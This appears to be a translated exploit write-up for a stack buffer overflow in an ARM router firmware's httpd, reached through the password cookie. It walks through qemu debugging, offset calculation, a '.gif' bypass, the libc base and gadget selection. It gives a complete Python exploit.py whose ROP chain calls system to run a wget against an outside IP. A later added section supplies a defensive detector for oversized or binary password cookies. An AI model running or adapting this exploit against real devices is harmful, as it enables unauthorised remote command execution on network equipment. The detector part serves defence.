Vulnerability analysis.
The vulnerable binary is bin/httpd.
Here the value of the password cookie is copied into the stack variable var_1c0, which overflows the stack:
The architecture is little-endian ARM.
First copy the ARM qemu-user static binary into the firmware root:
cp $(which qemu-arm-static) ./qemu
Use the following script to debug:
#!/bin/bash
PORT="1234"
# chroot into the firmware root and start httpd under qemu with the gdb stub listening on $PORT
chroot . ./qemu -g $PORT ./bin/httpd
Here the return value of connectcfm needs to be patched to 1:
The keypatch plugin is recommended; it lets you modify instructions directly in IDA: https://github.com/keystone-engine/keypatch
After patching, the HTTP service starts normally:
Set a breakpoint in R7WebsSecurityHandler and run exploit.py; execution stops at the breakpoint:
LR, the saved return address, is stored at 0xFECDC, and var_1c0, where the controllable input is stored, is at 0xFEB1C. So the payload is "A"*(0xFECDC-0xFEB1C) + "BBBB" (overwriting the return address) + "ccccdddd". Running it, execution did not reach pc=0x42424242; instead it faulted on a [R3] access.
After the whole password has been copied, the code also checks whether the string contains a "." and whether the three characters after the "." are "gif"; if so, it jumps straight to the end and never reaches the [R3] read. Adding ".gif" to the payload makes it crash with pc=0x42424242.
NX is enabled, so code on the stack cannot be executed directly and ROP is required.
Find the libc base address:
libc = 0x409c7000
But there is a pitfall here: this libc address is not correct, and the ROP chain would jump to the wrong place.
Look at the address of the puts function in the running process:
The offset of puts within libc:
So libc = 0x409dccd4 - 0x35cd4 = 0x409a7000.
libc contains the system function, so we need a gadget such as pop r0 or mov r0, sp that moves the parameter on the stack into r0:
ROPgadget --binary=./lib/libc.so.0 | grep "mov r0, sp"
Or: ROPgadget --binary=./lib/libc.so.0 --only "pop" | grep "r0". But pop {r0, pc} cannot be used, because the r0 parameter (the command string) is too long and pc would have to come after it. The following two gadgets work:
The first gadget pops the address of system into r3; the second moves sp (which points at the command string) into r0 and calls r3. The resulting exploit.py is as follows:
#!/usr/bin/env python2
import struct
import sys
import urllib2

host = sys.argv[1]  # target address, passed on the command line
url = "http://%s:80/goform/exeCommand" % (host)
libc = 0x409a7000
gadget1 = 0x00018298  # pop {r3, pc}
gadget1 = struct.pack("<I", gadget1 + libc)
system = 0x0005A270
system = struct.pack("<I", system + libc)
command = "wget 192.168.174.136"
gadget2 = 0x00040cb8  # mov r0, sp; blx r3
gadget2 = struct.pack("<I", gadget2 + libc)
# 444 bytes of padding plus ".gif" fill the 0x1c0-byte buffer up to the saved return address
password = "A" * 444 + ".gif" + gadget1 + system + gadget2 + command
req = urllib2.Request(url)
req.add_header("Cookie", "password=%s" % password)
try:
    resp = urllib2.urlopen(req)
except:
    pass
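As an added defender-side example (not part of the original article), the following Python 3 script inspects raw HTTP requests for a password cookie that is long enough to reach the 0x1c0-byte buffer var_1c0, or that carries non-printable bytes such as packed addresses. The request samples are constructed, and the 0x1c0 threshold is the buffer size from the analysis above.

```python
import re

# Size of the vulnerable stack buffer var_1c0 (0x1c0 bytes, taken from the analysis above).
BUFFER_SIZE = 0x1C0

# Matches the password cookie inside a Cookie header value.
PASSWORD_COOKIE_RE = re.compile(rb"(?:^|;\s*)password=([^;\r\n]*)", re.IGNORECASE)


def extract_password_cookie(raw_request):
    """Return the raw bytes of the password cookie in an HTTP request, or None."""
    head = raw_request.partition(b"\r\n\r\n")[0]
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            match = PASSWORD_COOKIE_RE.search(value.strip())
            if match:
                return match.group(1)
    return None


def inspect_request(raw_request):
    """Flag password cookies that could overflow var_1c0 or that carry binary data."""
    value = extract_password_cookie(raw_request)
    findings = []
    if value is not None:
        if len(value) >= BUFFER_SIZE:
            findings.append("password cookie is %d bytes, reaches the %d-byte buffer"
                            % (len(value), BUFFER_SIZE))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append("password cookie contains non-printable bytes")
    return {"password_len": len(value) if value is not None else 0, "findings": findings}


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (b"GET /goform/exeCommand HTTP/1.1\r\n"
                  b"Host: 192.168.0.1\r\n"
                  b"Cookie: password=hunter2\r\n\r\n")
# Same shape as the exploit request above: 444 bytes of padding, ".gif",
# packed addresses (non-printable filler here) and a command string.
OVERFLOW_REQUEST = (b"GET /goform/exeCommand HTTP/1.1\r\n"
                    b"Host: 192.168.0.1\r\n"
                    b"Cookie: lang=en; password=" + b"A" * 444 + b".gif"
                    + b"\x01\x02\x03\x04" + b"wget example\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("overflow", OVERFLOW_REQUEST)):
        print(name, inspect_request(req))
```

The same check can be fed with requests taken from a web-server access log or a packet capture; anything reaching the buffer size or carrying binary bytes in this cookie deserves a look.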